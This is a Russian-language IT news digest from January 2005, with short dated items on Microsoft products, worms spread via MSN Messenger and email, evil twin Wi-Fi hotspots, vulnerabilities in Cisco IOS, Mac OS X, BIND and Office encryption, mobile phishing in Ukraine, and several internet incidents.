Убеждать предприятия в необходимости перехода на новые версии Office — извечная задача Microsoft, однако компания надеется, что новый Elixir поможет ей в этом. Проект Elixir задуман как способ продвижения программы e-mail и контактов Microsoft Outlook, дополненной некоторыми новыми полями, в качестве инструмента для просмотра сведений о взаимоотношениях с заказчиками. Впоследствии он может помочь Microsoft выйти на рынок систем CRM, где сегодня доминируют Siebel Systems, Oracle и SAP. Внутри компании Microsoft пошла по этому пути в прошлом году, начав использовать Outlook как средство для доступа своего персонала продаж к хранилищу данных, связанному с ПО CRM от Siebel. Теперь Microsoft пытается превратить этот внутренний проект в набор инструментов, который смогут использовать и другие компании — и не только с продуктами Siebel. По словам генерального менеджера Microsoft по стратегии платформ Чарльза Фицжеральда, интерес со стороны внешних компаний очень велик. Microsoft не планирует получать доход от продажи Elixir, но рассчитывает на то, что компании станут глубже внедрять Office в свои бизнес-процессы. Так как код Elixir Microsoft разработала только для Office 2003, компания рассматривает этот инструмент как способ побудить заказчиков к апгрейду. В более отдаленной перспективе он может подхлестнуть и продажи Windows Server и другого ПО.
Подробнее

24/01/2005 14:07 Новый вирус распространяется через MSN
Антивирусные компании F-Secure и Symantec сообщили о новом компьютерном черве Brobia.A, распространяющемся через ПО мгновенного обмена сообщениями MSN Messenger. Червь является разновидностью вируса Rbot, может создавать «черный ход» и собирать информацию о пользователе, в том числе о нажатии кнопок мыши. Вредоносный код копирует себя на диск С в виде файлов drunk_lol.pif, webcam_004.pif, sexy_bedroom.pif, naked_party.pif или love_me.pif и осуществляет рассылку своих копий через MSN messenger на все контактные компьютеры, имеющие открытое окно программы.
CNews

24/01/2005 12:32 В помощь "сетевику"
Компанией AlterPoint выпущен инструментарий DeviceAuthority Suite 3.5, предназначенный для частичной автоматизации конфигурирования сетевых устройств в гетерогенных средах. Система "знает" форматы настроек оборудования 25 различных производителей, включая Cisco, Nortel и 3Com, и переводит их в универсальный формат для визуального сопоставления. В инструментарии реализован механизм проверки синтаксиса в процессе ручного конфигурирования - отмечаются упущенные команды, ошибки в написании команд и некорректные параметры. DeviceAuthority следит за изменениями, вносимыми в конфигурацию оборудования без ведома администратора, сообщает о них и может, если это предусмотрено заранее составленной политикой, вернуть модифицированные настройки в исходное состояние. Инструментарий интегрируется с распространенными протоколами аутентификации - CiscoSecure ACS, TACACS+ и RADIUS, что позволяет защищать доступ к устройствам паролями. Имеется возможность одновременного массового переконфигурирования любого количества устройств. После инсталляции система самостоятельно распознает все известное ей оборудование в сети.
"Открытые системы"

24/01/2005 12:06 SUN откроет DTrace
На пресс-конференции во вторник SUN планирует открыть под лицензией CDDL исходные тексты DTrace - структуры, призванной помогать решать проблемы, связанные с сетью, и увеличивать производительность системы в реальном времени - неотъемлеммой части Solaris 10. Том Гоген (Tom Goguen) заявил, что этот шаг еще раз подтверждает намерение SUN открыть Solaris.
Подробности

24/01/2005 11:51 Google ограничит спамеров
Компания Google разработала способ, препятствующий спамерам засорять онлайновые журналы – блоги – тысячами лишних ссылок. Еще две крупные поисковые системы Yahoo и MSN Search объявили о том, что они тоже будут использовать сервисы, препятствующие распространению спамерских ссылок. Популярные блог-сайты Slashdot, Livejournal и Scripting News намерены. Новый сервис Google разработан для аннулирования спамерных комментариев. Включаемый в код ссылки тэг «rel=”nofollow”” информирует поисковую машину игнорировать данную ссылку, тем самым отсеивая спамеров. Однако по мнению многих экспертов данное решение не будет работать. Одна из причин по мнению создателя searchenginewatch.com Криса Шермана (Chris Sherman) в том, что спамеры постоянно находят новые методы распространения, и нужно применять другие способы защиты от спама.
CNews

24/01/2005 10:59 «Дьявольские близнецы» угрожают безопасности сетей Wi-Fi
Специалисты из университета Крэнфилд предупреждают о новой угрозе для безопасности пользователей веба —хотспотах evil twin, которые представляют собой беспроводные сети, создаваемые хакерами и замаскированные под легитимные узлы беспроводного доступа Wi-Fi. Злоумышленники перехватывают соединение клиента с легитимной сетью, посылая более мощный сигнал с расположенной поблизости базовой станции, и таким образом превращают фальшивый узел доступа в так называемого «дьявольского близнеца». «Хотспоты evil twin представляют скрытую опасность для пользователей веба, — говорит специалист по беспроводному интернету и киберпреступлениям Фил Ноублз. — Беспроводные сети основаны на радиосигналах, коорые легко перехватить, настроившись на ту же частоту». Когда ничего не подозревающий пользователь подключается к evil twin, ему предлагают подложные приглашения к регистрации, после чего хакер легко перехватывает такие данные, как имя пользователя и пароль. В Крэнфилде уверены, что это начало новой эры киберпреступлений, для борьбы с которыми потребуются дополнительные исследования. Однако еще в октябре 2002 года секьюрити-фирма ISS описала процесс клонирования базовой станции, иначе называемый перехватом трафика evil twin, так что этой идее не меньше двух с половиной лет. Все технологические подробности содержатся в документе ISS 2002 года, описывающем «перехват трафика методом клонирования базовой станции (Evil Twin)». «Атакующий может обмануть клиентов легитимной беспроводной сети, заманив их в собственную сеть. Для этого достаточно разместить вблизи от местонахождения этих клиентов нелегальную базовую станцию с более сильным сигналом, имитирующую подлинную базовую станцию. В этом случае ничего не подозревающие пользователи будут пытаться зарегистрироваться на подставных серверах злоумышленника». Брайан Коллинз, отвечающий в Крэнфилдском университете за информационные системы, настоятельно рекомендует в целях самозащиты убедиться, что в устройстве Wi-Fi задействованы меры безопасности. По его словам, в подавляющем большинстве случаев базовые станции поставляются производителями в конфигурации с минимально возможной степенью защиты.
Подробности

24/01/2005 10:42 Сайт партии "Родина" снова атаковали хакеры
Интернет-сайт политической партии "Родина" в воскресенье стал недоступен для посетителей. Желающим попасть по интернет-адресу http://www.rodina.ru сначала выдавалось сообщение о невозможности соединения с сервером, однако в понедельник в первой половине дня посетители стали видеть текст "Извините, сайт временно не доступен. Попробуйте зайти через несколько минут". Как известно, на сайте проходила прямая трансляция из рабочего кабинета лидера партийной фракции в Госдуме Дмитрия Рогозина. Там депутаты фракции проводили голодовку, протестуя против закона о монетизации льгот. По словам одного из голодающих депутатов Михаила Маркелова, работу сайта нарушили неизвестные хакеры, которые провели целенаправленную атаку. Он отмечает, что специалисты "Родины" пытаются восстановить работу ресурса. "Если они не смогут это сделать, мы будем передавать картинку из кабинета Рогозина, где проходит голодовка, на других ресурсах, в том числе на моем личном сайте", - приводит слова Маркелова РИА "Новости".
Lenta.Ru

23/01/2005 14:38 В Белоруссии появился негосударственный лицензированный хостинг
Компания HT.by (УП «Конкордсервис», Минск) сообщила, что она получила лицензию Министерства связи и информации Республики Беларусь на предоставление профессиональных услуг хостинга на серверах, размещённых в Беларуси. В перечень услуг, указанных в лицензии, входит предоставление услуг передачи данных в Интернет (включая электронную почту). Теперь, по информации HT.by, можно размещать сайты на белорусских серверах не только через интернет-провайдеров, но и через профессиональную хостинговую компанию, чья приоритетная деятельность — предоставление услуг хостинга. Новые серверы хостинг-провайдера HT.by размещены в Международном центре коммутации (МЦК) РУП «Белтелеком» (канал 100 М/бит, используемая оперативная система — Unix). «Запуск новых белорусских серверов — это шаг навстречу тем пользователям, которые желают размещать свои сайты на серверах в Беларуси. Наличие лицензии позволяет документально оформлять покупку хостинга без применения сомнительных уловок, которыми пользуются недобросовестные компании. В прошлом году, отвечая постоянно растущим требованиям рынка, под наш новый проект нами была произведена замена персонала технической поддержки. Мы не намерены останавливаться на достигнутом и в 2005-м году бросим все свои силы на дальнейшее улучшение качества технического обслуживания. Будут внедрены новые современные технологии и перспективные сервисы, усовершенствовано взаимодействие с нашими клиентами и партнёрами,» — заявил директор компании Владимир Павлиш.
НОП

23/01/2005 13:51 DoS на IOS
Маршрутизаторы Cisco, в которых включена поддержка IOS Telephony Service, Cisco CallManager Express и Survivable Remote Site Telephony, использующих в своей работе Skinny Call Control Protocol, могут быть подвержены DoS-атаке, приводящей к постоянным перезагрузкам, сообщает bugtraq.ru. Патч доступен.
Подробности

23/01/2005 13:39 Internet Explorer сдает позиции
Браузер Internet Explorer продолжает терять популярность, сообщает ComputerWeekly. Теперь его доля на рынке составляет около 90%. Между тем, браузер Firefox компании Mozilla все больше укрепляет свои позиции. По мнению аналитиков компании Websidestory.com, в США он уже занимает 5% рынка, а популярность Internet Explorer будет падать дальше. В США его доля составляет 90,3%, однако за месяц Firefox сумел завоевать 1%. По их словам, в течение последних 10 недель число скачиваний интернет-браузера достигло 20 млн.
CNews

23/01/2005 13:26 Киберпреступность дошла до правительства
Государственные мужи собираются подумать о принятии мер по защите конфиденциальной информационной граждан в Сети. Сегодня на заседании федеральной антитеррористической комиссии, возглавляемой премьер-министром РФ Михаилом Фрадковым, будут, в числе прочего, рассмотрены вопросы, касающиеся подготовки мер правительства в области защиты информации. Об этом CNews сообщил заместитель руководителя «Росинформтехнологий» Александр Панкратов. «Развитие информационных технологий, с одной стороны — благо, с другой — некая беда, — отметил г-н Панкратов в беседе с обозревателем CNews. — Такое понятие как киберпреступность сегодня уже никого не удивляет, этой проблемой озабочено все мировое сообщество». По его мнению, у России есть конкурентоспособные решения в области борьбы со спамом, в области антивирусной защиты. Г-н Панкратов отметил также, что сегодня находятся в разработке отечественные решения для борьбы, например, с такой напастью, как фишинг. По его мнению, курс правительства на поддержку проектов по созданию технопарков, как раз и будет способствовать развитию подобных продуктов и технологий, которые, как правило, создаются молодыми людьми. «Конкретные решения могут быть очень небольшими и могут быть рассчитаны на те проекты, под которые создаются, — полагает он. — Как раз такие решения и должны выращиваться в рамках технопарков». Г-н Панкратов уверен, что если государство поддержит развитие таких решений, то отечественные разработчики смогут поставлять их на мировой рынок.
Более подробно

23/01/2005 12:44 PHRACK Team готовит финальный номер своего журнала
Как написано в анонсе, предваряющем очередной номер журнала PHRACK и предназначенном для объявления о начале приёма статей в новый, #63-й номер, он же станет ФИНАЛЬНЫМ номером! Журнал выпускался с 1985 года (то есть ровно 20 лет) и снискал заслуженную славу среди специалистов по компьютерной безопасности. Окончание приёма заявок, которые предлагается включить в финальный номер журнала, назначено на 10 июля 2005 г.
Cайт журнала

23/01/2005 10:36 Следующая версия Exchange соединит e-mail с голосовой почтой
В среду Microsoft рассказала о новых возможностях будущего сервера Exchange, который компания надеется превратить в универсальный инструмент для работы с e-mail, голосовой почтой и факсами. Версия Exchange 12 должна позволить работникам обращаться к своей голосовой почте через ПК и звонить на сервер по телефону, извлекая оттуда голосовую почту, а также данные календаря и e-mail. «По существу, Exchange Server превращается в сервер голосовой почты», — сказал в интервью вице-президент Microsoft Дейв Томпсон. О так называемой единой службе сообщений говорят давно, но обычно она получается громоздкой и часто требует компромиссов или согласования работы нескольких программных продуктов. Кроме средств для работы с факсами и голосовой почтой, Exchange 12 вберет в себя ряд функций, которые Microsoft планировала выпустить в этом году в составе дополнения Exchange Edge Services. Продукт должен был помочь в решении усугубляющихся проблем, связанных с распространением вирусов и спама, и обеспечить соответствие системы e-mail требованиям различных нормативов.
Подробнее

22/01/2005 17:01 Вышли первые патчи к JDK 1.5.0 для BSD-платформ
Проект по портированию Java на платформы *BSD (BSD Java Porting project) представил первый набор патчей (под кодовым названием «Sabretooth») к JDK 1.5. Патчи были разработаны Алексеем Зелкиным (Alexey Zelkin), а их портированием на NetBSD занимался Кристос Зулас (Christos Zoulas). На данный момент официально сообщается о поддержке следующих платформ: FreeBSD 4.10/i386, FreeBSD 5.3/i386, FreeBSD 5.3/amd64 и NetBSD 2.0/i386. Первый релиз JDK 1.5 для BSD предназначен только для экспериментального использования. Среди известных недостатков отмечается отсутствие поддержки plugin'ов и javaws (ожидается в следующем релизе), возможные проблемы с графическими приложениями в FreeBSD 4.x, никаких гарантий в поддержке FreeBSD 6-CURRENT. Набор патчей доступен для скачивания на eyesbeyond.com.
nixp.ru

22/01/2005 16:56 Суд обязал IBM показать исходники ОС AIX и Dynix
Судья Брук Уэллс вынесла очередное решение по иску компании SCO к корпорации IBM. Весной 2003 года SCO обвинила "Голубого гиганта" в незаконной передаче сообществу open-source фрагментов исходного кода операционной системы Unix System V, на который у SCO якобы имеется копирайт. Кроме того, согласно утверждениям руководства SCO, компания IBM нарушила контрактные обязательства, выпустив программные пакеты Dynix и AIX на основе "спорного" кода. Наконец, инициаторы конфликта заявляют, что исходники Unix System V частично перекочевали в ядра Linux версий 2.4 и выше. На этом основании SCO предлагает всем пользователям открытой ОС приобрести лицензии, стоимость которых превышает 700 долларов США за однопроцессорный сервер. Впрочем, более-менее убедительных доказательств "утечки" кода Unix System V фирма SCO так до сих пор и не предоставила. Однако и "Голубому гиганту" не удалось доказать беспочвенность претензий истцов. В результате на днях судья Брук Уэллс постановила, что IBM до 18 марта 2005 года обязана предоставить для анализа исходные коды всех без исключения версий своих операционных систем AIX и Dynix. Кроме того, должна быть предъявлена документация 3000 сотрудников IBM, вносивших изменения в AIX и Dynix, сообщает CNET News.
Подробнее

22/01/2005 16:22 Microsoft запустила платную почтовую службу Outlook Live
Корпорация Microsoft сообщила о запуске новой службы, получившей название Microsoft Office Outlook Live. Закрытое тестирование работы данного сервиса, напомним, было начато в середине декабря 2004 года. Абонентам службы предоставляется почтовый ящик объемом 2 Гб в системе MSN Hotmail (максимальный размер вложений в электронные письма - 20 Мб) и специальная "подписная" версия программы Outlook 2003. Сервис Outlook Live фактически представляет собой унифицированный интерфейс, при помощи которого пользователи MSN Hotmail могут получать и отправлять сообщения по почте, работать с календарем и контактной информацией. Кроме того, Microsoft Office Outlook Live обеспечивает улучшенную защиту от вирусов и более мощную фильтрацию спама, нежели стандартный вариант MSN Hotmail. Приобрести годовую подписку на Office Outlook Live можно за 44,95 доллара США, после 19 апреля стоимость возрастет до 59,95 доллара в год. Служба в настоящее время действует только в Соединенных Штатах, Великобритании и Канаде. В перспективе Microsoft может запустить аналогичные сервисы и на территориях других стран.
Подробнее

22/01/2005 16:10 Intel ускоряет работу над виртуализацией ПК
Intel приступит к воплощению идеи, которая позволит пользователям исполнять две операционной системы на одном и том же компьютере, уже в этом году. Перевод работ на ускоренный график лучше соответствует планам компании в отношении микропроцессоров. Технология Vanderpool, по существу, разделит ресурсы внутри одного ПК или сервера таким образом, что он сможет функционировать как две или более независимые машины. Подобная технология виртуализации широко применяется на рынке серверов, и в этом году Intel планирует реализовать ее в своем процессоре Itanium. Первоначально предполагалось, что Vanderpool появится в настольных ПК не ранее 2006 года. Теперь компания планирует выпустить настольные чипсеты и процессоры с использованием этой технологии уже в 2005 году. В четверг Intel опубликовала предварительную спецификацию Vanderpool. В этом году Intel выпустит также сдвоенные процессоры. Vanderpool хорошо согласуется с такими чипами. Сдвоенные процессоры предназначены для решения двух отдельных задач одновременно: программное обеспечение виртуализации поможет сбалансировать потребности в ресурсах каждого вычислительного ядра с потребностями ПО и другой аппаратуры в системе. Vanderpool представляет собой часть целого ряда усовершенствований, которые Intel добавляет в свои чипы с целью повышения общей производительности или гибкости без увеличения потребляемой мощности.
ZDNet

22/01/2005 15:45 eXeem открывает еще одну дверь для файлообмена
В пятницу подпольные программисты представили долгожданное ПО, которое сторонники файлообмена считают способным обеспечить защиту от судебных преследований со стороны Голливуда. Программа eXeem ставит перед собой цель соединить быстроту загрузки, характерную для популярного ПО BitTorrent, с мощными средствами глобального поиска, которыми отличается Kazaa или eDonkey. Первая общедоступная версия программы выпущена компанией Swarm Systems, но связана с веб-сайтом SuprNova, который до недавнего времени собирал миллионы людей, искавших в онлайне бесплатный контент посредством BitTorrent. В последние недели BitTorrent стал объектом агрессивных судебных атак со стороны киностудий, что привело к исчезновению нескольких основных центров онлайнового обмена файлами во всем мире. Некоторые сторонники eXeem ждали выпуска этой программы, считая ее спасением для сообщества, которое за короткое время внесло больший вклад в интернет-трафик, чем пользователи любой другой программы в онлайне. Однако разработчики высказываются скромно и слишком далеко не заглядывают. «Мы создали не новый BitTorrent, а совершенно другую P2P-программу, которая существенно отличается от BitTorrent, — сказал Андрей «Слончек» Престон, представитель Swarm Systems и хозяин ныне бездействующего сайта SuprNova. — На мой взгляд, это оригинальный подход. А будет ли он работать, покажет время». Выпуск новой программы — часть более широкого процесса становления одного из самых популярных в интернете пиринговых сообществ. Программа BitTorrent, некогда ориентированная исключительно на быстрые загрузки и не обладавшая достаточной для поиска емкостью или более развитыми функциями, теперь возродилась в форме обновленной версии Kazaa, конкурента TiVo и медиаинструмента для широкий масс.
Сайт программы

21/01/2005 17:24 На Украине зафиксирована новая форма мобильного фишинга
На Украине зафиксирована новая форма мобильного фишинга: "добровольный" перевод денег со счета абонента на лицевой счет другого абонента-мошенника. Об этом сообщил ПРАЙМ-ТАСС со ссылкой на специалиста по связям с общественностью компании "Киевстар" Виктор Гоцуленко. Суть обмана заключается в том, что мошенники осуществляют рассылку электронных сообщений потенциальным жертвам и делают рекламные постинги в популярных украинских интернет-форумах о "возможном" пополнении счета, который должен нанести ущерб оператору мобильной связи "Киевстар" (при этом предлагается осуществить специальный набор USSD команд, который приводит к списанию денег со счета доверчивого абонента), но при этом страдают сами абоненты. Некоторые эксперты считают подобную интернет-рассылку первой серьезной украинской фишинг-атакой, поскольку она опирается на использование новой услуги оператора мобильной связи компании "Киевстар", которая позволяет пересылку сумм со счета одного абонента на другой. По мнению В.Гоцуленко, абоненты всех украинских операторов сталкиваются с различными видами мошенничества, но с таким видом мошенничества компания "Киевстар" столкнулась впервые. "Появилась новая услуга - появилась новая форма мошенничества", - заявил он. Компания "Киевстар" с целью противостояния фактам мошенничества установила ограничения на количество трансакций (не более 2-х в день) и лимит на общую сумму остатка на лицевом счете в размере 3 000 гривен (нельзя чтобы остаток на счете абонента после пополнения превышал сумму лимита). Компания также планирует проводить серьезную информационно-разъяснительную работу среди абонентов. Компания "Киевстар" считает, что подобные факты мошенничества не причиняют большого ущерба абонентам, поскольку мошенники пытаются склонить к переводу небольших сумм денег (10-20 гривен, около 2-4 долларов). Но при этом В.Гоцуленко рекомендует абонентам, которые стали жертвами мошенничества обращаться в центр обслуживания абонентов с письменным заявлением, чтобы у компании были юридические основания бороться с мошенниками. Компания "Киевстар" ввела в декабре 2004 г для абонентов предоплаченного сервиса Ace&Base и Djuice услугу перевода средств с одного мобильного счета на другой на основе технологии USSD. Перевод денег осуществляется посредством специального USSD-запроса на перевод, после которого инициатору перевода приходит секретный код подтверждения в виде обычного SMS. Подтверждение перевода осуществляется опять же при помощи USSD-запроса с использованием секретного кода подтверждения в течение 5 минут после получения кода. До 5 мая 2005 г услуга предоставляется на бесплатной основе.
Источник

21/01/2005 14:32 Уязвимость в ядре Mac OS X
Сообщается о наличии уязвимости в ядре Darwin до (и включительно) версии 7.7.0 ОС Mac OS X 10.3. Уязвимость связана с некорректным кодом parse_machfile() в файле bsd/kern/mach_loader.c, в котором структура ncmds и смещение задаются как целые беззнаковые переменные, однако значение ncmds может быть выставлено в -1, что может привести к DoS, а также, возможно к повышению полномочий в системе. Автором выпущен эксплоит, который может вызвать зависание системы.
Описание и эксплоит

21/01/2005 14:10 StrongDisk для Windows Mobile
Компания "Физтех-софт" представила новый продукт, предназначенный для защиты конфиденциальной информации на смартфонах, КПК и других устройствах, работающих под управлением Windows Mobile (Windows CE). Система StrongDisk CE создана на основе технологии StrongDisk, которая используется во всех продуктах линейки защиты информации компании "Физтех-софт", при этом ее цена, по словам разработчиков, "сравнима со средней стоимостью аксессуаров для мобильных телефонов". Среди основных возможностей StrongDisk СЕ - использования алгоритмов кодирования с длиной ключа до 448 бит (AES, Blowfish, tripleDES, CAST, Safer), надежное удаление файлов, настраиваемый генератор паролей, возможность кодирования отдельных файлов и др. Кроме того, программа имеет встроенные средства для проверки файла-образа - если пользователь не уверен, насколько хорошо защищен файл, он может попробовать в тестовых целях взломать его с помощью перебора паролей, реализованного в StrongDisk CE.
"Открытые системы"

21/01/2005 13:47 Sun наконец-то решилась открыть исходный код Solaris
Sun Microsystems готова открыть исходный код операционной системы Solaris в конце месяца. Как заявил главный операционный директор Джонатан Шварц: "Мы надеемся, что к концу этого месяца коды будут опубликованы", передает vnunetwork. В Sun и раньше говорили что они готовы открыть исходники ОС Solaris, однако откладывали дату открытия мотивируя это тем, что не могут подобрать соответствующую лицензию. Открыв исходники, компания планирует вернуть себе часть рынка, которую в последнее время потеряла из-за растущей популярности Linux. Организация OSI (The Open Source Initiative) в минувший вторник приняла лицензию, ппредлагаемую Sun, придав ей статус "official open source licence". "На самом деле, факт принятия OSI нашей лицензии дает свободу действий в том плане, что мы вольны выбрать и другую лицензию (BSD или GPL)" - сказал Шварц. По Sun, решение выбора той или иной лицензии это "гораздо больше, чем просто формальный шаг, выбрав одну из лицензий, мы закладываем основы того стиля, которым будут руководствоваться люди, использующие наш продукт". Шварц отмечает, что потребности различных категорий пользователей совершенно различны. "Не существует абсолютной лицензии для всех одинаково хорошо подходящей. Мы хотим убедится, что наш выбор будет отвечать интересам большинства" - сказал Шварц. Стоит отдельно отметить, что ранее Sun никогда не затрагивала проблему выбора лицензий.
CyberSecurity

21/01/2005 13:25 Panda Software будет бороться с фишингом
Panda Software стала Корпоративным Спонсором Группы по борьбе с фишингом (Anti-Phishing Working Group), ассоциации представителей индустрии IT-безопасности, целью которой является борьба с мошенничеством, известным как фишинг. Этот альянс, сформированный главными представителями индустрии IT-безопасности, нацелен на борьбу с угрозой фишинга. Фишинг стал одной из самых больших угроз для пользователей интернета. Он заключается в использовании фальшивых электронных писем, всплывающих окон и веб-сайтов для того, чтобы красть личные финансовые данные, например номера счетов, пароли или пин-коды и т.д. Случаи фишинга становится все более частыми. По данным Группы по борьбе с фишингом, частота атак увеличилась на 180 процентов между апрелем и маем 2004, что означает, что все больше злоумышленников посвящает себя совершению онлайновых мошенничеств.
Источник

21/01/2005 12:51 Россиянам наплевать на информационную безопасность
Компания InfoWatch опубликовала первое ежегодное исследование проблемы внутренней информационной безопасности в России. Результаты его толкают на невеселые размышления. Исследование выявило целый ряд исключительно интересных фактов, которые могут представлять профессиональный интерес для специалистов в области информационной безопасности, маркетинга и продаж:
- 62% респондентов считают, что действия инсайдеров являются самой большой угрозой для российских организаций.
- 89% считают электронную почту самым распространенным путем утечки конфиденциальной информации.
- 67% не осведомлены о наличии инцидентов в сети организации, связанных с утечкой данных.
- 99,4% допускают возможность наличия незарегистрированных инцидентов внутренней ИБ.
- 76% планируют внедрение систем защиты от нарушения конфиденциальности информации в ближайшие 2 года.
И, наконец, десерт!
- 87% считают технические средства эффективным способом защиты. Однако всего 1% респондентов используют их, в то время как 68% вообще не предпринимают никаких действий.
- Российские организации осознают опасность внутренних ИТ-угроз, но не знают как с ней бороться: 58% не осведомлены о существующих технологических решениях.
Подробности

21/01/2005 12:17 SCO исправляет версию BIND
SCO выпущен бюллетень по безопасности SCOSA-2005.4, в котором описывается существование уязвимости в выпускаемой компанией ОС - OpenServer 5.0.6, 5.0.7. Уязвимость присутствует в ISC BIND (ПО для обеспечения работы DNS-cервера) версий до 8.3.7 и 8.4.3 и позволяет удалённому атакующему внедрить в кэш DNS-сервера некорректное имя посредством поддельного нейм-сервера, который будет возвращать негативные ответы с большим значением поля TTL (Time To Live). Выпущены обновления.
Подробности

21/01/2005 12:04 Maxell выпустил защищенный DVD
Компания Maxell объявила о выпуске новой серии DVD, которые, по их словам, отличаются защитой от царапин и пыли. Модель 8X DVD-R Pro уже доступны на рынке, а диски 16X DVD-R Pro появятся в продаже в марте 2005 года. Компания TDK ранее уже выпустила на рынок защищенные DVD. Однако от них модели Maxell будут отличаться дополнительной антистатической защитой, что позволит использовать носители даже в пыльных условиях.
CNews

21/01/2005 10:56 Вирус маскируется под заголовки CNN
Компьютерный вирус, названный антивирусной компанией Sophos как "Crowt.A", распространяется, обманывая потенциальные жертвы тем, что маскируется под заголовки CNN. После открытия вложения вирус проникает в компьютер и может похитить конфиденциальную информацию. После установки программы "Crowt.A" способен фиксировать нажатия клавиш на клавиатуре и таким образом узнавать пароли.
CNews

21/01/2005 10:38 В системе шифрования Office обнаружена ошибка
Функция защиты данных в документах Microsoft Word и Excel содержит серьезную ошибку, которая позволяет злоумышленникам расшифровывать защищенные паролем файлы. Проблема вызвана тем, что программисты Microsoft неправильно реализовали алгоритм шифрования в приложениях Office, пишет в комментарии специалист по криптографии из института Infocomm Research в Сингапуре Хунцзюнь Ву. «Из этих шифрованных файлов можно извлечь очень много информации. Если кто-то пользовался шифрованием в документах Microsoft Office… то им пора заняться оценкой причиненного ущерба». Microsoft в четверг сообщила, что она приступила к изучению этого дефекта. «Наше раннее расследование показывает, что эта проблема очень мало угрожает заказчикам, — говорится в заявлении Microsoft, адресованном CNET News.com. — В некоторых случаях злоумышленник может прочесть содержимое зашифрованного файла, если в его распоряжении находится несколько версий этого файла. Чтобы попытаться воспользоваться уязвимостью, злоумышленнику потребуется доступ к двум разным файлам с одним и тем же именем, которые к тому же защищены одним и тем же паролем». В теории шифрования схемы, кодирующие более одного сообщения с применением одного и того же ключа, считаются недопустимыми. Дело в том, что сравнением информации шифрованных сообщений можно значительно сократить время поиска нужного пароля для их расшифровки. Ошибка Microsoft Office — не первая проблема, возникшая у Microsoft с реализацией методов шифрования в ее продуктах. Секьюрити-эксперты то и дело указывали компании на слабые пароли в предыдущих версиях операционной системы Windows. А в 1999 году компания оказалась в центре споров по поводу того, действительно ли безопасны ключи, на которых строится безопасность Windows NT.
Подробности

21/01/2005 10:06 У проституток отобрали доменное имя предвыборного сайта Путина
Доменное имя putin2000.ru, которое использовалось предвыборным штабом Владимира Путина в ходе президентских выборов 2000 года для размещения по этому адресу агитационного сайта, после истечения срока регистрации оказалось захвачено другими людьми, которые перенаправили домен на санкт-петербургский сайт, принимающий заказы на проституток. Срок регистрации домена истек в 2004 году, и держатели домена (по данным издания NEWSru.com, домен был зарегистрирован на самого Путина) не стали его продлевать. Когда имя освободилось, оно было перерегистрировано на некоего Константина Воробьева. Согласно действующим правилам доменной регистрации (порядок администрирования доменов сейчас определяет "Координационный центр национального домена сети Интернет"), он указал свой телефон, по которому издание NEWSru.com связалось с ним. Воробьев заявил, что перекупил домен "из-за популярности: у сайта была очень высокая степень цитирования", и сделать это ему никто не мешал. Он сказал, что "не в курсе", того, кто именно перенаправил домен на сайт с проститутками. Информация о "необычной" функциональности домена попала в прессу утром 20 января. В течение первой половины этого дня все желающие могли наблюдать как при заходе на сайт putin2000.ru появляется страница, в заглавии которой указано доменное имя spbgirls.ru. Регистрационные данные обоих доменов свидетельствуют, что имена указывают на сервер санкт-петербургской хостинговой компании Majordomo.ru. После того, как информация о захвате домена появилась в СМИ, перестали отвечать оба имени, позже они возобновили прежнюю функциональность, а около 17:30 по московскому времени оба имени стали указывать на официальный сайт президента РФ. Впоследствии (около 18:30) сайты были разведены - адрес spbgirls.ru стал работать в прежнем режиме, а putin2000.ru - указывать на настоящий президентский сайт. Следует отметить, что эти изменения были вызваны действиями либо хостинговой компании либо тех, кто имеет доступ к управлению сайтом - домен не сменил владельца, официально передать права на имя столь оперативно невозможно. Имя putin2000.ru в итоге не перестало указывать на тот же сервер, на нем лишь была настроена переадресация.
Lenta.Ru

20/01/2005 21:03 Авария на LiveJournal произошла из-за случайного нажатия "красной кнопки"
Брэд Фицпатрик (Brad Fitzpatrick), глава компании, содержащей популярный в России блоггерский сайт LiveJournal.com, в четверг опубликовал на нем заявление, поясняющее, что именно произошло 15 января, когда из-за внезапного отключения электроэнергии сайт перестал работать и восстанавливался более суток. Как ранее сообщалось, "падение" "Живого журнала" (так его называют русскоязычные пользователи, которых сейчас насчитывается около 100 тысяч; всего у сайта около 5,5 миллионов пользователей во всем мире) вызвало бурную реакцию общественности и появление различного рода домыслов - не только среди простых пользователей, но и в массовой прессе. Первоначально сообщалось, что авария была вызвана тем, что помещение одной из технических площадок хостинговой компании Internap в Сиэтле, где расположены более ста серверов "Живого журнала", было внезапно обесточено, причем перестали работать даже системы резервного питания. Однако причины возникновения этой нештатной ситуации оставались неизвестными. После проведенного Internap внутреннего расследования было установлено, что один из клиентов той же хостинговой площадки случайно нажал кнопку аварийного обесточивания здания. Такие кнопки (EPO, Emergency Power Off) устанавливаются в зданиях США согласно государственным стандартам обеспечения пожарной охраны. Отмечается, что нажавший кнопку клиент не просто нажал ее, а сначала снял с кнопки защитную крышку, а после нажатия поставил ее на место. Тем не менее, о преднамеренном саботаже говорить не приходится, так как виновник чистосердечно признался в содеянном. О том, что его побудило сделать это, умалчивается, однако Фицпатрик замечает, что известен аналогичный инцидент, когда кто-то нажал кнопку EPO, думая, что она открывает находящуюся рядом с ней дверь. Отключение резервного питания было вызвано тем, что по нажатию кнопки EPO прекращает работу и оно - технологическим процессом предусмотрено, что при поступлении команды аварийного отключения энергии, системы бесперебойного питания также самостоятельно выключаются. Специалисты Internap проведут ревизию противопожарных систем с целью обеспечить должную защиту всем имеющимся в здании аварийным кнопкам. Фицпатрик также объясняет, почему восстановление нормальной работы сайта заняло столь длительное время. Энергоснабжение было восстановлено менее, чем через час, но администраторы не могли запустить сайт в прежнем режиме без тщательной проверки всех систем. При внезапном отключении возможны потери данных и выход из строя оборудования - необходимо было удостовериться, что все работает штатно. Как выяснилось, некоторые компоненты все же вышли из строя, и необходимо было их заменить, а также восстановить потерянные данные из резервных копий (в LiveJournal все поступающие данные дублируются на резервных серверах).
Подробности

20/01/2005 20:47 В 2004 году рынок интернет-музыки вырос в 10 раз
